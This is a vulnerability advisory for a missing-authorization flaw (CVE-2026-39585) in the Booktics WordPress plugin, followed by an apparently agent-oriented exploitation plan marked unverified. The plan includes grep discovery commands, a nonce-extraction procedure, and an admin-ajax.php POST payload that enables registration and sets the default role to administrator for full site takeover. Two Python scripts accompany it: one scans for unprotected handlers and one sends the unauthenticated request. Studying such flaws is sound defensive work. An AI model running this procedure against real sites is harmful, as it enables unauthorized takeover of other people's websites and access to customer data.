CVE-2026-39585

Booktics <= 1.0.16 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 1.0.17
Time to patch: 73d

Description

The Booktics plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.0.16. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions: <=1.0.16
Published: February 2, 2026
Last updated: April 15, 2026
Affected plugin: booktics

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan targets a Missing Authorization vulnerability in the Booktics plugin (<= 1.0.16). Since the source files are not provided, this plan focuses on identifying the specific vulnerable AJAX actions and exploiting them based on common "Missing Authorization" patterns in WordPress plugins.


1. Vulnerability Summary

The Booktics plugin (<= 1.0.16) fails to implement proper capability checks (e.g., current_user_can()) on one or more of its AJAX handlers. Specifically, functions registered with the wp_ajax_nopriv_ hook (accessible to unauthenticated users) or wp_ajax_ (accessible to any logged-in user) perform sensitive operations—such as modifying plugin settings, exporting data, or managing appointments—without verifying that the requester has administrative privileges.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Vulnerable Hooks (Potential): wp_ajax_nopriv_booktics_... or wp_ajax_booktics_...
  • Action Parameter: action=booktics_[vulnerable_action]
  • Authentication: Unauthenticated (if nopriv is used) or Subscriber-level (if only wp_ajax_ is used without capability checks).
  • Payload Type: application/x-www-form-urlencoded

3. Discovery & Code Flow

The agent must first identify which AJAX action is vulnerable.

Step 1: Identify all AJAX handlers

grep -rnE "wp_ajax_nopriv_|wp_ajax_" wp-content/plugins/booktics/

Step 2: Analyze the callback functions
For each identified action (e.g., booktics_save_settings, booktics_export_data, booktics_delete_appointment), trace the callback function:

  1. Locate the function definition: grep -rn "function [function_name]" wp-content/plugins/booktics/
  2. Check for current_user_can('manage_options') or similar checks.
  3. Check for check_ajax_referer (to see if a nonce is required).

Vulnerable Flow:
admin-ajax.php -> do_action('wp_ajax_nopriv_...') -> Vulnerable_Function() -> Performs update_option() or $wpdb->query() without checking permissions.
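The discovery step above can be scripted instead of walked by hand with grep. The scanner below is an added example written for this page, not Booktics code and not part of the original research plan: it maps each add_action('wp_ajax_...') registration to its callback, then inspects the callback body for a capability check, a nonce check, request input and state-changing sinks (the same update_option / $wpdb heuristic the backup discovery command in section 9 greps for). The PHP it scans is a constructed sample in the shape the plan describes; its hook names, callbacks and option handling are assumptions, not code from the plugin.

```python
import re
from dataclasses import dataclass

# Constructed PHP sample for this example (not Booktics source). The first handler
# has the vulnerable shape: reachable via wp_ajax_nopriv_, guarded only by a nonce,
# writing an attacker-chosen option. The second has the hardened shape.
SAMPLE_PHP = r'''<?php
add_action( 'wp_ajax_nopriv_booktics_save_settings', 'booktics_save_settings' );
add_action( 'wp_ajax_booktics_save_settings', 'booktics_save_settings' );
add_action( 'wp_ajax_booktics_delete_appointment', 'booktics_delete_appointment' );

function booktics_save_settings() {
    check_ajax_referer( 'booktics_nonce_action', 'security' );    // nonce only
    update_option( $_POST['option_name'], $_POST['option_value'] ); // no capability check
    wp_send_json_success();
}

function booktics_delete_appointment() {
    check_ajax_referer( 'booktics_nonce_action', 'security' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    global $wpdb;
    $wpdb->delete( $wpdb->prefix . 'booktics_appointments', array( 'id' => absint( $_POST['id'] ) ) );
    wp_send_json_success();
}
'''

# add_action( 'wp_ajax_[nopriv_]<action>', '<callback>' ) with a string callback.
# Array callbacks such as array( $this, 'method' ) are not matched; review those by hand.
HOOK_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(nopriv_)?([\w-]+)['"]\s*,\s*['"]([\w:\\]+)['"]"""
)
CAP_RE = re.compile(r"\bcurrent_user_can\s*\(")
NONCE_RE = re.compile(r"\b(?:check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\(")
INPUT_RE = re.compile(r"\$_(?:POST|GET|REQUEST)\b")
SINK_RE = re.compile(
    r"\b(update_option|add_option|delete_option|wp_update_user|wp_insert_user)\s*\("
    r"|\$wpdb->(insert|update|delete|query)\s*\("
)


def function_body(src, name):
    """Return the body of `function name(...) { ... }` by brace matching, or None.
    Naive about braces inside strings and comments, which is adequate for triage."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


@dataclass
class Finding:
    action: str
    unauthenticated: bool      # registered on wp_ajax_nopriv_
    callback: str
    has_capability_check: bool
    has_nonce_check: bool
    reads_request: bool
    sinks: list

    @property
    def risk(self):
        """Nonce checks are deliberately ignored: logged-out visitors get nonces too."""
        if self.has_capability_check:
            return "ok"
        if self.sinks:
            return "high" if self.unauthenticated else "medium"
        return "review"


def triage(src):
    """Map every registered AJAX action to its callback and inspect the callback."""
    findings = []
    for m in HOOK_RE.finditer(src):
        nopriv, action, callback = m.group(1) is not None, m.group(2), m.group(3)
        body = function_body(src, callback.split("::")[-1]) or ""
        findings.append(Finding(
            action=action,
            unauthenticated=nopriv,
            callback=callback,
            has_capability_check=bool(CAP_RE.search(body)),
            has_nonce_check=bool(NONCE_RE.search(body)),
            reads_request=bool(INPUT_RE.search(body)),
            sinks=[g1 or "wpdb->" + g2 for g1, g2 in SINK_RE.findall(body)],
        ))
    return findings


def candidates(src):
    """Action names to test first: unauthenticated reach, sinks, no capability check."""
    return sorted({f.action for f in triage(src) if f.risk == "high"})


if __name__ == "__main__":
    for f in triage(SAMPLE_PHP):
        hook = "wp_ajax_nopriv_" if f.unauthenticated else "wp_ajax_"
        print(f"{f.risk:6} {hook}{f.action} -> {f.callback}() "
              f"cap={f.has_capability_check} nonce={f.has_nonce_check} sinks={f.sinks}")
```

To run it against the real plugin, concatenate the plugin's PHP files and pass the text to triage(); the risk rating intentionally treats a nonce-only guard as unprotected, which is the whole point of this bug class.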

4. Nonce Acquisition Strategy

If the vulnerable function calls check_ajax_referer( 'booktics_nonce_action', 'security' ), the agent must retrieve a valid nonce. A nonce check does not substitute for authorization: WordPress issues nonces to logged-out visitors as well (bound to user ID 0 and an empty session token), so any client that can load the page localizing the script obtains one, and a nopriv handler guarded only by a nonce remains reachable by unauthenticated attackers.

  1. Identify Nonce Localization:
    Search for wp_localize_script to find the JS object containing the nonce.
    grep -rn "wp_localize_script" wp-content/plugins/booktics/
    
  2. Determine Triggering Page:
    Identify which shortcode or admin page enqueues the script. Likely Booktics shortcodes (inferred from the plugin's purpose, to be confirmed against its add_shortcode() registrations): [booktics_appointment], [booktics_booking].
  3. Create Page:
    wp post create --post_type=page --post_status=publish --post_title="Booking" --post_content="[booktics_appointment]"
    
  4. Extract Nonce:
    Navigate to the newly created page and use browser_eval to extract the nonce:
    • Localization Key (Inferred): booktics_ajax_obj or booktics_params.
    • JS Command: browser_eval("window.booktics_ajax_obj?.nonce")

5. Exploitation Strategy

The action name booktics_save_settings below is a placeholder for whichever handler the discovery step actually flags (a settings-save action is the usual shape for this bug class). The request assumes the handler accepts an arbitrary option name and value, which is the worst case and must be confirmed by reading the callback.

Request Details:

  • Method: POST
  • URL: http://[target]/wp-admin/admin-ajax.php
  • Body:
    action=booktics_save_settings&security=[NONCE]&option_name=users_can_register&option_value=1
    
    (Note: If the action modifies plugin settings specifically, the parameters might be settings[registration_enabled]=1).

Payload for Privilege Escalation (if the handler permits writing arbitrary options):

  1. Set users_can_register to 1.
  2. Set default_role to administrator.

With both options set, anyone can sign up through the standard WordPress registration form and is created with the administrator role, turning the missing capability check into a full site takeover.

6. Test Data Setup

  1. Install Booktics version 1.0.16.
  2. Ensure a page with the Booktics shortcode exists to facilitate nonce extraction if needed.
  3. Verify the initial state of the target setting:
    wp option get users_can_register
    wp option get default_role
    

7. Expected Results

  • HTTP Response: 200 OK or {"success":true}. A body of "0" with HTTP 400 means admin-ajax.php found no handler registered for that action on the hook that applies to the session (no wp_ajax_nopriv_ handler for an unauthenticated request); a body of "-1" with HTTP 403 means check_ajax_referer() rejected the nonce. Neither indicates the action ran.
  • Impact: The plugin performs the action (e.g., updating a global WordPress option) despite the request being unauthenticated.
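Sections 4 to 7 form one procedure: pull the nonce from a public page, build the admin-ajax.php POST, and read the reply. The script below is an added example written for this page, not code from the original plan or from the plugin. It parses the object that wp_localize_script() emits, assembles the request without sending it, and classifies the response using admin-ajax.php's documented exit codes. The page fragment is constructed; the object name booktics_ajax_obj, the nonce key, the host and the nonce value are assumptions, as is the action name.

```python
import json
import re
import urllib.error
import urllib.request
from urllib.parse import urlencode

# Constructed page fragment in the shape wp_localize_script() emits. The object
# name, the 'nonce' key, the host and the nonce value are assumptions for this
# example, not values observed in Booktics.
SAMPLE_PAGE = r'''<html><body>
<script id="booktics-frontend-js-extra">
var booktics_ajax_obj = {"ajax_url":"http:\/\/target.example\/wp-admin\/admin-ajax.php","nonce":"8f3a1c2e9b"};
</script>
<div class="booktics-booking"></div>
</body></html>'''

LOCALIZED_RE = re.compile(r"var\s+(\w+)\s*=\s*(\{.*?\});", re.S)


def extract_localized(html, object_name):
    """Return the object wp_localize_script() assigned to `object_name`, or None."""
    for m in LOCALIZED_RE.finditer(html):
        if m.group(1) == object_name:
            return json.loads(m.group(2))
    return None


def build_request(ajax_url, action, nonce, params, nonce_param="security"):
    """Assemble the admin-ajax.php POST as (url, headers, body) without sending it."""
    form = {"action": action, nonce_param: nonce, **params}
    return ajax_url, {"Content-Type": "application/x-www-form-urlencoded"}, urlencode(form)


def classify_response(status, text):
    """Interpret admin-ajax.php's reply.
    '0' (HTTP 400): no handler registered for the action on the hook that applies to
        this session (no wp_ajax_nopriv_ handler for an unauthenticated request).
    '-1' (HTTP 403): check_ajax_referer() rejected the nonce.
    JSON with "success": true: the handler ran and reported success.
    Anything else: the handler ran; read the body (a trailing '0' is admin-ajax's default exit)."""
    body = text.strip()
    if body == "0":
        return "no_handler"
    if body == "-1":
        return "nonce_rejected"
    try:
        data = json.loads(body)
    except ValueError:
        return "handled_non_json"
    if isinstance(data, dict) and data.get("success") is True:
        return "handled_success"
    return "handled_error"


def http_post(url, headers, body):
    """Real transport; use only against a lab instance you own."""
    req = urllib.request.Request(url, data=body.encode(), headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def probe(page_html, post, action, params, object_name="booktics_ajax_obj",
          nonce_key="nonce", nonce_param="security"):
    """Full flow: pull the nonce from the public page, send one unauthenticated
    request for `action` through `post`, and classify what came back."""
    obj = extract_localized(page_html, object_name)
    if not obj or nonce_key not in obj:
        return "no_nonce"
    url, headers, body = build_request(obj["ajax_url"], action, obj[nonce_key], params, nonce_param)
    status, text = post(url, headers, body)
    return classify_response(status, text)


if __name__ == "__main__":
    # Offline demo with a fake transport standing in for the target; swap in http_post
    # (and a page fetched from the lab site) to run it for real.
    fake = lambda url, headers, body: (200, '{"success":true,"data":null}')
    print(probe(SAMPLE_PAGE, fake, "booktics_save_settings",
                {"option_name": "users_can_register", "option_value": "1"}))
```

The transport is injected so the same flow runs offline with a canned reply and against a lab target with http_post; a "handled_success" classification still has to be confirmed server-side with the WP-CLI checks in section 8, since a handler can answer success without having written anything.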

8. Verification Steps

After sending the exploit request, use WP-CLI to confirm the unauthorized change:

# Check if settings were changed
wp option get users_can_register
# Check if sensitive data was leaked (if the vulnerability was an export action)
# Check if an appointment was deleted/modified

9. Alternative Approaches

If booktics_save_settings is not the vulnerable action, the agent should look for:

  1. booktics_export_customers: Check if it returns customer PII in the AJAX response.
  2. booktics_cancel_appointment: Check if it allows canceling any appointment ID without ownership verification.
  3. booktics_update_appointment_status: Check if it allows an unauthenticated user to mark appointments as "Paid" or "Confirmed".

Backup Discovery Command:

# Look for functions that take POST data and interact with options/database
grep -rP "update_option|wpdb->(insert|update|delete|query)" wp-content/plugins/booktics/ -B 10 | grep "_POST"

Research Findings
Static analysis — not yet PoC-verified

Summary

The Booktics plugin for WordPress fails to implement capability checks on its AJAX handlers in versions up to 1.0.16. This allows unauthenticated attackers to perform unauthorized actions, such as modifying plugin configurations or accessing customer data, by sending crafted requests to the admin-ajax.php endpoint.

Exploit Outline

  1. Identify vulnerable AJAX actions registered via 'wp_ajax_nopriv_' hooks in the plugin code, which are accessible to unauthenticated users.
  2. Visit a public-facing page containing a Booktics booking shortcode to extract the necessary AJAX nonce from the localized 'booktics_ajax_obj' JavaScript object.
  3. Construct a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to the vulnerable function and the 'security' parameter containing the extracted nonce.
  4. Include payload parameters to perform unauthorized tasks, such as 'option_name' and 'option_value' if the function permits updating plugin settings.
